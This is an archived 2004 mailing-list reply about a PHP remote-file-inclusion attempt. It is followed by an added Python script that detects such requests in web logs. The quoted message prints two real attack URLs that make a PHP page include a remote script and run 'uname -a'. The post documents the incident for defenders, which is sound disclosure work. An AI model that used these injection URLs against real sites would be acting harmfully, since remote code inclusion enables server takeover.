Security Incidents mailing list archives

Re: PHP injection attempt from 200.222.244.154


From: Kirby Angell <kangell () alertra com>
Date: Mon, 22 Nov 2004 20:09:22 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Haha... note to self, do not include the actual attack URL in the
message.  Judging from this referer:

Referer: http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499


I'd say someone got my message from this list and then clicked on the
URLs  :-)

Kirby Angell wrote:
...
| The attacker IP made 4 attempts to exploit a common coding error found
| in PHP applications. The flaw involves injecting a malicious URL into a
| variable that the given PHP page later uses in an 'include' statement.
| In all attempts, the given page was not susceptible to the attack and
| therefore a 302 Not Found error was returned.
|
| In the first attempt, the attacker tried:
|
| http://[domain]/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a
|
| The rest of the attempts the attacker tried:
|
| http://[domain]/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a
|
...

(I edited them out this time)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBopvS21unUZAE9MARAmb0AJ9bxXgRZE7w2VLzECmwhCXr0dE2ewCeO3La
DrJM5PIDq+0NM2xN6pC6Bak=
=dj/a
-----END PGP SIGNATURE-----
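
The request pattern quoted in the message above, seen from the log side. This is an added example, not part of the original post: it scans access-log lines for query parameters whose value is a remote URL and records the Referer host, the field that showed list readers clicking the published link. The log lines, addresses, hostnames and function name are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines (documentation IPs and hostnames).
SAMPLE_LOG = """\
198.51.100.7 - - [22/Nov/2004:19:58:01 -0600] "GET /uptime.php?pin=http://files.example.net/cs.jpg?&cmd=uname%20-a HTTP/1.1" 404 312 "-" "Mozilla/4.0"
198.51.100.7 - - [22/Nov/2004:19:58:03 -0600] "GET /uptime.php?pin=hTTp%3A%2F%2Ffiles.example.net/cs.jpg HTTP/1.1" 404 312 "-" "Mozilla/4.0"
203.0.113.9 - - [22/Nov/2004:20:12:44 -0600] "GET /uptime.php?pin=http://files.example.net/cs.jpg?&cmd=uname%20-a HTTP/1.1" 404 312 "http://webmail.example.org/mail?view=cv" "Mozilla/5.0"
203.0.113.20 - - [22/Nov/2004:20:13:10 -0600] "GET /uptime.php?pin=1234 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')
# A parameter value that is itself a remote URL is the include-injection signature.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def find_remote_include_attempts(log_text):
    """Return one record per request carrying a URL-valued query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, target, status, referer = m.groups()
        query = target.partition("?")[2]
        # parse_qsl percent-decodes, so encoded schemes are caught as well.
        params = [k for k, v in parse_qsl(query, keep_blank_values=True)
                  if REMOTE_RE.match(v)]
        if params:
            hits.append({
                "ip": ip,
                "params": params,
                "status": int(status),
                # A webmail or archive Referer suggests a reader clicked a
                # published link; "-" yields None.
                "referer_host": urlsplit(referer).hostname,
            })
    return hits


if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG):
        print(hit)
```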

